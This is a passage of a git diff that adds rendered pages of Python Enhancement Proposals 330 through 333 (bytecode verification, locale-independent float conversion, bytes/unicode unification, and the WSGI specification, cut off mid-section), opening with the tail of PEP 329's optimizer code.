+    for k, v in vars(mc).items():
+        if type(v) is FunctionType:
+            newv = bind_constants(v, builtin_only, stoplist, verbose)
+            setattr(mc, k, newv)
+        elif type(v) in (type, ClassType):
+            bind_all(v, builtin_only, stoplist, verbose)
+
+
+def f(): pass
+try:
+    f.func_code.code
+except AttributeError:                  # detect non-CPython environments
+    bind_all = lambda *args, **kwds: 0
+del f
+
+import sys
+bind_all(sys.modules[__name__])         # Optimizer, optimize thyself!
+
+
+

Note the automatic detection of a non-CPython environment that does not +have bytecodes [2]. In that situation, the bind functions would simply +return the original function unchanged. This assures that the two +line additions to library modules do not impact other implementations.

+

The final code should add a flag to make it easy to disable binding.

+
+
+

References

+

[1] ASPN Recipe for a non-private implementation + https://code.activestate.com/recipes/277940/

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0329.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0330/index.html b/pep-0330/index.html new file mode 100644 index 00000000000..c17e9498cdd --- /dev/null +++ b/pep-0330/index.html @@ -0,0 +1,325 @@ + + + + + + + + PEP 330 – Python Bytecode Verification | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 330 – Python Bytecode Verification

+
+
Author:
+
Michel Pelletier <michel at users.sourceforge.net>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
17-Jun-2004
+
Python-Version:
+
2.6
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

If Python Virtual Machine (PVM) bytecode is not “well-formed” it +is possible to crash or exploit the PVM by causing various errors +such as under/overflowing the value stack or reading/writing into +arbitrary areas of the PVM program space. Most of these kinds of +errors can be eliminated by verifying that PVM bytecode does not +violate a set of simple constraints before execution.

+

This PEP proposes a set of constraints on the format and structure +of Python Virtual Machine (PVM) bytecode and provides an +implementation in Python of this verification process.

+
+
+

Pronouncement

+

Guido believes that a verification tool has some value. If +someone wants to add it to Tools/scripts, no PEP is required.

+

Such a tool may have value for validating the output from +“bytecodehacks” or from direct edits of PYC files. As security +measure, its value is somewhat limited because perfectly valid +bytecode can still do horrible things. That situation could +change if the concept of restricted execution were to be +successfully resurrected.

+
+
+

Motivation

+

The Python Virtual Machine executes Python programs that have been +compiled from the Python language into a bytecode representation. +The PVM assumes that any bytecode being executed is “well-formed” +with regard to a number implicit constraints. Some of these +constraints are checked at run-time, but most of them are not due +to the overhead they would create.

+

When running in debug mode the PVM does do several run-time checks +to ensure that any particular bytecode cannot violate these +constraints that, to a degree, prevent bytecode from crashing or +exploiting the interpreter. These checks add a measurable +overhead to the interpreter, and are typically turned off in +common use.

+

Bytecode that is not well-formed and executed by a PVM not running +in debug mode may create a variety of fatal and non-fatal errors. +Typically, ill-formed code will cause the PVM to seg-fault and +cause the OS to immediately and abruptly terminate the +interpreter.

+

Conceivably, ill-formed bytecode could exploit the interpreter and +allow Python bytecode to execute arbitrary C-level machine +instructions or to modify private, internal data structures in the +interpreter. If used cleverly this could subvert any form of +security policy an application may want to apply to its objects.

+

Practically, it would be difficult for a malicious user to +“inject” invalid bytecode into a PVM for the purposes of +exploitation, but not impossible. Buffer overflow and memory +overwrite attacks are commonly understood, particularly when the +exploit payload is transmitted unencrypted over a network or when +a file or network security permission weakness is used as a +foothold for further attacks.

+

Ideally, no bytecode should ever be allowed to read or write +underlying C-level data structures to subvert the operation of the +PVM, whether the bytecode was maliciously crafted or not. A +simple pre-execution verification step could ensure that bytecode +cannot over/underflow the value stack or access other sensitive +areas of PVM program space at run-time.

+

This PEP proposes several validation steps that should be taken on +Python bytecode before it is executed by the PVM so that it +compiles with static and structure constraints on its instructions +and their operands. These steps are simple and catch a large +class of invalid bytecode that can cause crashes. There is also +some possibility that some run-time checks can be eliminated up +front by a verification pass.

+

There is, of course, no way to verify that bytecode is “completely +safe”, for every definition of complete and safe. Even with +bytecode verification, Python programs can and most likely in the +future will seg-fault for a variety of reasons and continue to +cause many different classes of run-time errors, fatal or not. +The verification step proposed here simply plugs an easy hole that +can cause a large class of fatal and subtle errors at the bytecode +level.

+

Currently, the Java Virtual Machine (JVM) verifies Java bytecode +in a way very similar to what is proposed here. The JVM +Specification version 2 [1], Sections 4.8 and 4.9 were therefore +used as a basis for some of the constraints explained below. Any +Python bytecode verification implementation at a minimum must +enforce these constraints, but may not be limited to them.

+
+
+

Static Constraints on Bytecode Instructions

+
    +
  1. The bytecode string must not be empty. (len(co_code) > 0).
  2. +
  3. The bytecode string cannot exceed a maximum size +(len(co_code) < sizeof(unsigned char) - 1).
  4. +
  5. The first instruction in the bytecode string begins at index 0.
  6. +
  7. Only valid byte-codes with the correct number of operands can +be in the bytecode string.
  8. +
+
+
+

Static Constraints on Bytecode Instruction Operands

+
    +
  1. The target of a jump instruction must be within the code +boundaries and must fall on an instruction, never between an +instruction and its operands.
  2. +
  3. The operand of a LOAD_* instruction must be a valid index into +its corresponding data structure.
  4. +
  5. The operand of a STORE_* instruction must be a valid index +into its corresponding data structure.
  6. +
+
+
+

Structural Constraints between Bytecode Instructions

+
    +
  1. Each instruction must only be executed with the appropriate +number of arguments in the value stack, regardless of the +execution path that leads to its invocation.
  2. +
  3. If an instruction can be executed along several different +execution paths, the value stack must have the same depth prior +to the execution of the instruction, regardless of the path +taken.
  4. +
  5. At no point during execution can the value stack grow to a +depth greater than that implied by co_stacksize.
  6. +
  7. Execution never falls off the bottom of co_code.
  8. +
+
+
+

Implementation

+

This PEP is the working document for a Python bytecode +verification implementation written in Python. This +implementation is not used implicitly by the PVM before executing +any bytecode, but is to be used explicitly by users concerned +about possibly invalid bytecode with the following snippet:

+
import verify
+verify.verify(object)
+
+
+

The verify module provides a verify function which accepts the +same kind of arguments as dis.dis: classes, methods, functions, +or code objects. It verifies that the object’s bytecode is +well-formed according to the specifications of this PEP.

+

If the code is well-formed the call to verify returns silently +without error. If an error is encountered, it throws a +VerificationError whose argument indicates the cause of the +failure. It is up to the programmer whether or not to handle the +error in some way or execute the invalid code regardless.

+

Phillip Eby has proposed a pseudo-code algorithm for bytecode +stack depth verification used by the reference implementation.

+
+
+

Verification Issues

+

This PEP describes only a small number of verifications. While +discussion and analysis will lead to many more, it is highly +possible that future verification may need to be done or custom, +project-specific verifications. For this reason, it might be +desirable to add a verification registration interface to the test +implementation to register future verifiers. The need for this is +minimal since custom verifiers can subclass and extend the current +implementation for added behavior.

+
+
+

Required Changes

+

Armin Rigo noted that several byte-codes will need modification in +order for their stack effect to be statically analyzed. These are +END_FINALLY, POP_BLOCK, and MAKE_CLOSURE. Armin and Guido have +already agreed on how to correct the instructions. Currently the +Python implementation punts on these instructions.

+

This PEP does not propose to add the verification step to the +interpreter, but only to provide the Python implementation in the +standard library for optional use. Whether or not this +verification procedure is translated into C, included with the PVM +or enforced in any way is left for future discussion.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0330.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0331/index.html b/pep-0331/index.html new file mode 100644 index 00000000000..de42a950e3b --- /dev/null +++ b/pep-0331/index.html @@ -0,0 +1,321 @@ + + + + + + + + PEP 331 – Locale-Independent Float/String Conversions | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 331 – Locale-Independent Float/String Conversions

+
+
Author:
+
Christian R. Reis <kiko at async.com.br>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
19-Jul-2003
+
Python-Version:
+
2.4
+
Post-History:
+
21-Jul-2003, 13-Aug-2003, 18-Jun-2004
+
+
+
+
Table of Contents +
+
+

Abstract

+

Support for the LC_NUMERIC locale category in Python 2.3 is +implemented only in Python-space. This causes inconsistent +behavior and thread-safety issues for applications that use +extension modules and libraries implemented in C that parse and +generate floats from strings. This document proposes a plan for +removing this inconsistency by providing and using substitute +locale-agnostic functions as necessary.

+
+
+

Introduction

+

Python provides generic localization services through the locale +module, which among other things allows localizing the display and +conversion process of numeric types. Locale categories, such as +LC_TIME and LC_COLLATE, allow configuring precisely what aspects +of the application are to be localized.

+

The LC_NUMERIC category specifies formatting for non-monetary +numeric information, such as the decimal separator in float and +fixed-precision numbers. Localization of the LC_NUMERIC category +is currently implemented only in Python-space; C libraries invoked +from the Python runtime are unaware of Python’s LC_NUMERIC +setting. This is done to avoid changing the behavior of certain +low-level functions that are used by the Python parser and related +code [2].

+

However, this presents a problem for extension modules that wrap C +libraries. Applications that use these extension modules will +inconsistently display and convert floating-point values.

+

James Henstridge, the author of PyGTK [3], has additionally +pointed out that the setlocale() function also presents +thread-safety issues, since a thread may call the C library +setlocale() outside of the GIL, and cause Python to parse and +generate floats incorrectly.

+
+
+

Rationale

+

The inconsistency between Python and C library localization for +LC_NUMERIC is a problem for any localized application using C +extensions. The exact nature of the problem will vary depending +on the application, but it will most likely occur when parsing or +formatting a floating-point value.

+
+
+

Example Problem

+

The initial problem that motivated this PEP is related to the +GtkSpinButton [4] widget in the GTK+ UI toolkit, wrapped by the +PyGTK module. The widget can be set to numeric mode, and when +this occurs, characters typed into it are evaluated as a number.

+

Problems occur when LC_NUMERIC is set to a locale with a float +separator that differs from the C locale’s standard (for instance, +‘,’ instead of ‘.’ for the Brazilian locale pt_BR). Because +LC_NUMERIC is not set at the libc level, float values are +displayed incorrectly (using ‘.’ as a separator) in the +spinbutton’s text entry, and it is impossible to enter fractional +values using the ‘,’ separator.

+

This small example demonstrates reduced usability for localized +applications using this toolkit when coded in Python.

+
+
+

Proposal

+

Martin v. Löwis commented on the initial constraints for an +acceptable solution to the problem on python-dev:

+
    +
  • LC_NUMERIC can be set at the C library level without +breaking the parser.
  • +
  • float() and str() stay locale-unaware.
  • +
  • locale-aware str() and atof() stay in the locale module.
  • +
+

An analysis of the Python source suggests that the following +functions currently depend on LC_NUMERIC being set to the C +locale:

+
    +
  • Python/compile.c:parsenumber()
  • +
  • Python/marshal.c:r_object()
  • +
  • Objects/complexobject.c:complex_to_buf()
  • +
  • Objects/complexobject.c:complex_subtype_from_string()
  • +
  • Objects/floatobject.c:PyFloat_FromString()
  • +
  • Objects/floatobject.c:format_float()
  • +
  • Objects/stringobject.c:formatfloat()
  • +
  • Modules/stropmodule.c:strop_atof()
  • +
  • Modules/cPickle.c:load_float()
  • +
+

The proposed approach is to implement LC_NUMERIC-agnostic +functions for converting from (strtod()/atof()) and to +(snprintf()) float formats, using these functions where the +formatting should not vary according to the user-specified locale.

+

The locale module should also be changed to remove the +special-casing for LC_NUMERIC.

+

This change should also solve the aforementioned thread-safety +problems.

+
+
+

Potential Code Contributions

+

This problem was initially reported as a problem in the GTK+ +libraries [5]; since then it has been correctly diagnosed as an +inconsistency in Python’s implementation. However, in a fortunate +coincidence, the glib library (developed primarily for GTK+, not +to be confused with the GNU C library) implements a number of +LC_NUMERIC-agnostic functions (for an example, see [6]) for +reasons similar to those presented in this paper.

+

In the same GTK+ problem report, Havoc Pennington suggested that +the glib authors would be willing to contribute this code to the +PSF, which would simplify implementation of this PEP considerably. +Alex Larsson, the original author of the glib code, submitted a +PSF Contributor Agreement [7] on 2003-08-20 [8] to ensure the code +could be safely integrated; this agreement has been received and +accepted.

+
+
+

Risks

+

There may be cross-platform issues with the provided +locale-agnostic functions, though this risk is low given that the +code supplied simply reverses any locale-dependent changes made to +floating-point numbers.

+

Martin and Guido pointed out potential copyright issues with the +contributed code. I believe we will have no problems in this area +as members of the GTK+ and glib teams have said they are fine with +relicensing the code, and a PSF contributor agreement has been +mailed in to ensure this safety.

+

Tim Peters has pointed out [9] that there are situations involving +threading in which the proposed change is insufficient to solve +the problem completely. A complete solution, however, does not +currently exist.

+
+
+

Implementation

+

An implementation was developed by Gustavo Carneiro <gjc at +inescporto.pt>, and attached to Sourceforge.net bug 774665 [10]

+

The final patch [11] was integrated into Python CVS by Martin v. +Löwis on 2004-06-08, as stated in the bug report.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0331.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0332/index.html b/pep-0332/index.html new file mode 100644 index 00000000000..cbbe1625c50 --- /dev/null +++ b/pep-0332/index.html @@ -0,0 +1,193 @@ + + + + + + + + PEP 332 – Byte vectors and String/Unicode Unification | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 332 – Byte vectors and String/Unicode Unification

+
+
Author:
+
Skip Montanaro <skip at pobox.com>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
11-Aug-2004
+
Python-Version:
+
2.5
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP outlines the introduction of a raw bytes sequence object +and the unification of the current str and unicode objects.

+
+
+

Rejection Notice

+

This PEP is rejected in this form. The author has expressed lack of +time to continue to shepherd it, and discussion on python-dev has +moved to a slightly different proposal which will (eventually) be +written up as a new PEP. See the thread starting at +https://mail.python.org/pipermail/python-dev/2006-February/060930.html.

+
+
+

Rationale

+

Python’s current string objects are overloaded. They serve both to +hold ASCII and non-ASCII character data and to also hold sequences of +raw bytes which have no reasonable interpretation as displayable +character sequences. This overlap hasn’t been a big problem in the +past, but as Python moves closer to requiring source code to be +properly encoded, the use of strings to represent raw byte sequences +will be more problematic. In addition, as Python’s Unicode support +has improved, it’s easier to consider strings as ASCII-encoded Unicode +objects.

+
+
+

Proposed Implementation

+

The number in parentheses indicates the Python version in which the +feature will be introduced.

+
    +
  • Add a bytes builtin which is just a synonym for str. (2.5)
  • +
  • Add a b"..." string literal which is equivalent to raw string +literals, with the exception that values which conflict with the +source encoding of the containing file not generate warnings. (2.5)
  • +
  • Warn about the use of variables named “bytes”. (2.5 or 2.6)
  • +
  • Introduce a bytes builtin which refers to a sequence distinct +from the str type. (2.6)
  • +
  • Make str a synonym for unicode. (3.0)
  • +
+
+
+

Bytes Object API

+

TBD.

+
+
+

Issues

+
    +
  • Can this be accomplished before Python 3.0?
  • +
  • Should bytes objects be mutable or immutable? (Guido seems to +like them to be mutable.)
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0332.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0333/index.html b/pep-0333/index.html new file mode 100644 index 00000000000..1dc05aae5e2 --- /dev/null +++ b/pep-0333/index.html @@ -0,0 +1,1689 @@ + + + + + + + + PEP 333 – Python Web Server Gateway Interface v1.0 | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 333 – Python Web Server Gateway Interface v1.0

+
+
Author:
+
Phillip J. Eby <pje at telecommunity.com>
+
Discussions-To:
+
Web-SIG list
+
Status:
+
Final
+
Type:
+
Informational
+
Created:
+
07-Dec-2003
+
Post-History:
+
07-Dec-2003, 08-Aug-2004, 20-Aug-2004, 27-Aug-2004, 27-Sep-2010
+
Superseded-By:
+
3333
+
+
+
+
Table of Contents +
+
+

Preface

+

Note: For an updated version of this spec that supports Python 3.x and +includes community errata, addenda, and clarifications, please +see PEP 3333 instead.

+
+
+

Abstract

+

This document specifies a proposed standard interface between web +servers and Python web applications or frameworks, to promote web +application portability across a variety of web servers.

+
+
+

Rationale and Goals

+

Python currently boasts a wide variety of web application frameworks, +such as Zope, Quixote, Webware, SkunkWeb, PSO, and Twisted Web – to +name just a few [1]. This wide variety of choices can be a problem +for new Python users, because generally speaking, their choice of web +framework will limit their choice of usable web servers, and vice +versa.

+

By contrast, although Java has just as many web application frameworks +available, Java’s “servlet” API makes it possible for applications +written with any Java web application framework to run in any web +server that supports the servlet API.

+

The availability and widespread use of such an API in web servers for +Python – whether those servers are written in Python (e.g. Medusa), +embed Python (e.g. mod_python), or invoke Python via a gateway +protocol (e.g. CGI, FastCGI, etc.) – would separate choice of +framework from choice of web server, freeing users to choose a pairing +that suits them, while freeing framework and server developers to +focus on their preferred area of specialization.

+

This PEP, therefore, proposes a simple and universal interface between +web servers and web applications or frameworks: the Python Web Server +Gateway Interface (WSGI).

+

But the mere existence of a WSGI spec does nothing to address the +existing state of servers and frameworks for Python web applications. +Server and framework authors and maintainers must actually implement +WSGI for there to be any effect.

+

However, since no existing servers or frameworks support WSGI, there +is little immediate reward for an author who implements WSGI support. +Thus, WSGI must be easy to implement, so that an author’s initial +investment in the interface can be reasonably low.

+

Thus, simplicity of implementation on both the server and framework +sides of the interface is absolutely critical to the utility of the +WSGI interface, and is therefore the principal criterion for any +design decisions.

+

Note, however, that simplicity of implementation for a framework +author is not the same thing as ease of use for a web application +author. WSGI presents an absolutely “no frills” interface to the +framework author, because bells and whistles like response objects and +cookie handling would just get in the way of existing frameworks’ +handling of these issues. Again, the goal of WSGI is to facilitate +easy interconnection of existing servers and applications or +frameworks, not to create a new web framework.

+

Note also that this goal precludes WSGI from requiring anything that +is not already available in deployed versions of Python. Therefore, +new standard library modules are not proposed or required by this +specification, and nothing in WSGI requires a Python version greater +than 2.2.2. (It would be a good idea, however, for future versions +of Python to include support for this interface in web servers +provided by the standard library.)

+

In addition to ease of implementation for existing and future +frameworks and servers, it should also be easy to create request +preprocessors, response postprocessors, and other WSGI-based +“middleware” components that look like an application to their +containing server, while acting as a server for their contained +applications.

+

If middleware can be both simple and robust, and WSGI is widely +available in servers and frameworks, it allows for the possibility +of an entirely new kind of Python web application framework: one +consisting of loosely-coupled WSGI middleware components. Indeed, +existing framework authors may even choose to refactor their +frameworks’ existing services to be provided in this way, becoming +more like libraries used with WSGI, and less like monolithic +frameworks. This would then allow application developers to choose +“best-of-breed” components for specific functionality, rather than +having to commit to all the pros and cons of a single framework.

+

Of course, as of this writing, that day is doubtless quite far off. +In the meantime, it is a sufficient short-term goal for WSGI to +enable the use of any framework with any server.

+

Finally, it should be mentioned that the current version of WSGI +does not prescribe any particular mechanism for “deploying” an +application for use with a web server or server gateway. At the +present time, this is necessarily implementation-defined by the +server or gateway. After a sufficient number of servers and +frameworks have implemented WSGI to provide field experience with +varying deployment requirements, it may make sense to create +another PEP, describing a deployment standard for WSGI servers and +application frameworks.

+
+
+

Specification Overview

+

The WSGI interface has two sides: the “server” or “gateway” side, and +the “application” or “framework” side. The server side invokes a +callable object that is provided by the application side. The +specifics of how that object is provided are up to the server or +gateway. It is assumed that some servers or gateways will require an +application’s deployer to write a short script to create an instance +of the server or gateway, and supply it with the application object. +Other servers and gateways may use configuration files or other +mechanisms to specify where an application object should be +imported from, or otherwise obtained.

+

In addition to “pure” servers/gateways and applications/frameworks, +it is also possible to create “middleware” components that implement +both sides of this specification. Such components act as an +application to their containing server, and as a server to a +contained application, and can be used to provide extended APIs, +content transformation, navigation, and other useful functions.

+

Throughout this specification, we will use the term “a callable” to +mean “a function, method, class, or an instance with a __call__ +method”. It is up to the server, gateway, or application implementing +the callable to choose the appropriate implementation technique for +their needs. Conversely, a server, gateway, or application that is +invoking a callable must not have any dependency on what kind of +callable was provided to it. Callables are only to be called, not +introspected upon.

+
+

The Application/Framework Side

+

The application object is simply a callable object that accepts +two arguments. The term “object” should not be misconstrued as +requiring an actual object instance: a function, method, class, +or instance with a __call__ method are all acceptable for +use as an application object. Application objects must be able +to be invoked more than once, as virtually all servers/gateways +(other than CGI) will make such repeated requests.

+

(Note: although we refer to it as an “application” object, this +should not be construed to mean that application developers will use +WSGI as a web programming API! It is assumed that application +developers will continue to use existing, high-level framework +services to develop their applications. WSGI is a tool for +framework and server developers, and is not intended to directly +support application developers.)

+

Here are two example application objects; one is a function, and the +other is a class:

+
def simple_app(environ, start_response):
+    """Simplest possible application object"""
+    status = '200 OK'
+    response_headers = [('Content-type', 'text/plain')]
+    start_response(status, response_headers)
+    return ['Hello world!\n']
+
+
+class AppClass:
+    """Produce the same output, but using a class
+
+    (Note: 'AppClass' is the "application" here, so calling it
+    returns an instance of 'AppClass', which is then the iterable
+    return value of the "application callable" as required by
+    the spec.
+
+    If we wanted to use *instances* of 'AppClass' as application
+    objects instead, we would have to implement a '__call__'
+    method, which would be invoked to execute the application,
+    and we would need to create an instance for use by the
+    server or gateway.
+    """
+
+    def __init__(self, environ, start_response):
+        self.environ = environ
+        self.start = start_response
+
+    def __iter__(self):
+        status = '200 OK'
+        response_headers = [('Content-type', 'text/plain')]
+        self.start(status, response_headers)
+        yield "Hello world!\n"
+
+
+
+
+

The Server/Gateway Side

+

The server or gateway invokes the application callable once for each +request it receives from an HTTP client, that is directed at the +application. To illustrate, here is a simple CGI gateway, implemented +as a function taking an application object. Note that this simple +example has limited error handling, because by default an uncaught +exception will be dumped to sys.stderr and logged by the web +server.

+
import os, sys
+
+def run_with_cgi(application):
+
+    environ = dict(os.environ.items())
+    environ['wsgi.input']        = sys.stdin
+    environ['wsgi.errors']       = sys.stderr
+    environ['wsgi.version']      = (1, 0)
+    environ['wsgi.multithread']  = False
+    environ['wsgi.multiprocess'] = True
+    environ['wsgi.run_once']     = True
+
+    if environ.get('HTTPS', 'off') in ('on', '1'):
+        environ['wsgi.url_scheme'] = 'https'
+    else:
+        environ['wsgi.url_scheme'] = 'http'
+
+    headers_set = []
+    headers_sent = []
+
+    def write(data):
+        if not headers_set:
+             raise AssertionError("write() before start_response()")
+
+        elif not headers_sent:
+             # Before the first output, send the stored headers
+             status, response_headers = headers_sent[:] = headers_set
+             sys.stdout.write('Status: %s\r\n' % status)
+             for header in response_headers:
+                 sys.stdout.write('%s: %s\r\n' % header)
+             sys.stdout.write('\r\n')
+
+        sys.stdout.write(data)
+        sys.stdout.flush()
+
+    def start_response(status, response_headers, exc_info=None):
+        if exc_info:
+            try:
+                if headers_sent:
+                    # Re-raise original exception if headers sent
+                    raise exc_info[0], exc_info[1], exc_info[2]
+            finally:
+                exc_info = None     # avoid dangling circular ref
+        elif headers_set:
+            raise AssertionError("Headers already set!")
+
+        headers_set[:] = [status, response_headers]
+        return write
+
+    result = application(environ, start_response)
+    try:
+        for data in result:
+            if data:    # don't send headers until body appears
+                write(data)
+        if not headers_sent:
+            write('')   # send headers now if body was empty
+    finally:
+        if hasattr(result, 'close'):
+            result.close()
+
+
+
+
+

Middleware: Components that Play Both Sides

+

Note that a single object may play the role of a server with respect +to some application(s), while also acting as an application with +respect to some server(s). Such “middleware” components can perform +such functions as:

+
    +
  • Routing a request to different application objects based on the +target URL, after rewriting the environ accordingly.
  • +
  • Allowing multiple applications or frameworks to run side by side +in the same process
  • +
  • Load balancing and remote processing, by forwarding requests and +responses over a network
  • +
  • Perform content postprocessing, such as applying XSL stylesheets
  • +
+

The presence of middleware in general is transparent to both the +“server/gateway” and the “application/framework” sides of the +interface, and should require no special support. A user who +desires to incorporate middleware into an application simply +provides the middleware component to the server, as if it were +an application, and configures the middleware component to +invoke the application, as if the middleware component were a +server. Of course, the “application” that the middleware wraps +may in fact be another middleware component wrapping another +application, and so on, creating what is referred to as a +“middleware stack”.

+

For the most part, middleware must conform to the restrictions +and requirements of both the server and application sides of +WSGI. In some cases, however, requirements for middleware +are more stringent than for a “pure” server or application, +and these points will be noted in the specification.

+

Here is a (tongue-in-cheek) example of a middleware component that +converts text/plain responses to pig Latin, using Joe Strout’s +piglatin.py. (Note: a “real” middleware component would +probably use a more robust way of checking the content type, and +should also check for a content encoding. Also, this simple +example ignores the possibility that a word might be split across +a block boundary.)

+
from piglatin import piglatin
+
+class LatinIter:
+
+    """Transform iterated output to piglatin, if it's okay to do so
+
+    Note that the "okayness" can change until the application yields
+    its first non-empty string, so 'transform_ok' has to be a mutable
+    truth value.
+    """
+
+    def __init__(self, result, transform_ok):
+        if hasattr(result, 'close'):
+            self.close = result.close
+        self._next = iter(result).next
+        self.transform_ok = transform_ok
+
+    def __iter__(self):
+        return self
+
+    def next(self):
+        if self.transform_ok:
+            return piglatin(self._next())
+        else:
+            return self._next()
+
+class Latinator:
+
+    # by default, don't transform output
+    transform = False
+
+    def __init__(self, application):
+        self.application = application
+
+    def __call__(self, environ, start_response):
+
+        transform_ok = []
+
+        def start_latin(status, response_headers, exc_info=None):
+
+            # Reset ok flag, in case this is a repeat call
+            del transform_ok[:]
+
+            for name, value in response_headers:
+                if name.lower() == 'content-type' and value == 'text/plain':
+                    transform_ok.append(True)
+                    # Strip content-length if present, else it'll be wrong
+                    response_headers = [(name, value)
+                        for name, value in response_headers
+                            if name.lower() != 'content-length'
+                    ]
+                    break
+
+            write = start_response(status, response_headers, exc_info)
+
+            if transform_ok:
+                def write_latin(data):
+                    write(piglatin(data))
+                return write_latin
+            else:
+                return write
+
+        return LatinIter(self.application(environ, start_latin), transform_ok)
+
+
+# Run foo_app under a Latinator's control, using the example CGI gateway
+from foo_app import foo_app
+run_with_cgi(Latinator(foo_app))
+
+
+
+
+
+

Specification Details

+

The application object must accept two positional arguments. For +the sake of illustration, we have named them environ and +start_response, but they are not required to have these names. +A server or gateway must invoke the application object using +positional (not keyword) arguments. (E.g. by calling +result = application(environ, start_response) as shown above.)

+

The environ parameter is a dictionary object, containing CGI-style +environment variables. This object must be a builtin Python +dictionary (not a subclass, UserDict or other dictionary +emulation), and the application is allowed to modify the dictionary +in any way it desires. The dictionary must also include certain +WSGI-required variables (described in a later section), and may +also include server-specific extension variables, named according +to a convention that will be described below.

+

The start_response parameter is a callable accepting two +required positional arguments, and one optional argument. For the sake +of illustration, we have named these arguments status, +response_headers, and exc_info, but they are not required to +have these names, and the application must invoke the +start_response callable using positional arguments (e.g. +start_response(status, response_headers)).

+

The status parameter is a status string of the form +"999 Message here", and response_headers is a list of +(header_name, header_value) tuples describing the HTTP response +header. The optional exc_info parameter is described below in the +sections on The start_response() Callable and Error Handling. +It is used only when the application has trapped an error and is +attempting to display an error message to the browser.

+

The start_response callable must return a write(body_data) +callable that takes one positional parameter: a string to be written +as part of the HTTP response body. (Note: the write() callable is +provided only to support certain existing frameworks’ imperative output +APIs; it should not be used by new applications or frameworks if it +can be avoided. See the Buffering and Streaming section for more +details.)

+

When called by the server, the application object must return an +iterable yielding zero or more strings. This can be accomplished in a +variety of ways, such as by returning a list of strings, or by the +application being a generator function that yields strings, or +by the application being a class whose instances are iterable. +Regardless of how it is accomplished, the application object must +always return an iterable yielding zero or more strings.

+

The server or gateway must transmit the yielded strings to the client +in an unbuffered fashion, completing the transmission of each string +before requesting another one. (In other words, applications +should perform their own buffering. See the Buffering and +Streaming section below for more on how application output must be +handled.)

+

The server or gateway should treat the yielded strings as binary byte +sequences: in particular, it should ensure that line endings are +not altered. The application is responsible for ensuring that the +string(s) to be written are in a format suitable for the client. (The +server or gateway may apply HTTP transfer encodings, or perform +other transformations for the purpose of implementing HTTP features +such as byte-range transmission. See Other HTTP Features, below, +for more details.)

+

If a call to len(iterable) succeeds, the server must be able +to rely on the result being accurate. That is, if the iterable +returned by the application provides a working __len__() +method, it must return an accurate result. (See +the Handling the Content-Length Header section for information +on how this would normally be used.)

+

If the iterable returned by the application has a close() method, +the server or gateway must call that method upon completion of the +current request, whether the request was completed normally, or +terminated early due to an error (this is to support resource release +by the application). This protocol is intended to complement PEP 325’s +generator support, and other common iterables with close() methods.

+

(Note: the application must invoke the start_response() +callable before the iterable yields its first body string, so that the +server can send the headers before any body content. However, this +invocation may be performed by the iterable’s first iteration, so +servers must not assume that start_response() has been called +before they begin iterating over the iterable.)

+

Finally, servers and gateways must not directly use any other +attributes of the iterable returned by the application, unless it is an +instance of a type specific to that server or gateway, such as a “file +wrapper” returned by wsgi.file_wrapper (see Optional +Platform-Specific File Handling). In the general case, only +attributes specified here, or accessed via e.g. the PEP 234 iteration +APIs are acceptable.

+
+

environ Variables

+

The environ dictionary is required to contain these CGI +environment variables, as defined by the Common Gateway Interface +specification [2]. The following variables must be present, +unless their value would be an empty string, in which case they +may be omitted, except as otherwise noted below.

+
+
REQUEST_METHOD
The HTTP request method, such as "GET" or "POST". This +cannot ever be an empty string, and so is always required.
+
SCRIPT_NAME
The initial portion of the request URL’s “path” that corresponds to +the application object, so that the application knows its virtual +“location”. This may be an empty string, if the application +corresponds to the “root” of the server.
+
PATH_INFO
The remainder of the request URL’s “path”, designating the virtual +“location” of the request’s target within the application. This +may be an empty string, if the request URL targets the +application root and does not have a trailing slash.
+
QUERY_STRING
The portion of the request URL that follows the "?", if any. +May be empty or absent.
+
CONTENT_TYPE
The contents of any Content-Type fields in the HTTP request. +May be empty or absent.
+
CONTENT_LENGTH
The contents of any Content-Length fields in the HTTP request. +May be empty or absent.
+
SERVER_NAME, SERVER_PORT
When combined with SCRIPT_NAME and PATH_INFO, these variables +can be used to complete the URL. Note, however, that HTTP_HOST, +if present, should be used in preference to SERVER_NAME for +reconstructing the request URL. See the URL Reconstruction +section below for more detail. SERVER_NAME and SERVER_PORT +can never be empty strings, and so are always required.
+
SERVER_PROTOCOL
The version of the protocol the client used to send the request. +Typically this will be something like "HTTP/1.0" or "HTTP/1.1" +and may be used by the application to determine how to treat any +HTTP request headers. (This variable should probably be called +REQUEST_PROTOCOL, since it denotes the protocol used in the +request, and is not necessarily the protocol that will be used in the +server’s response. However, for compatibility with CGI we have to +keep the existing name.)
+
HTTP_ Variables
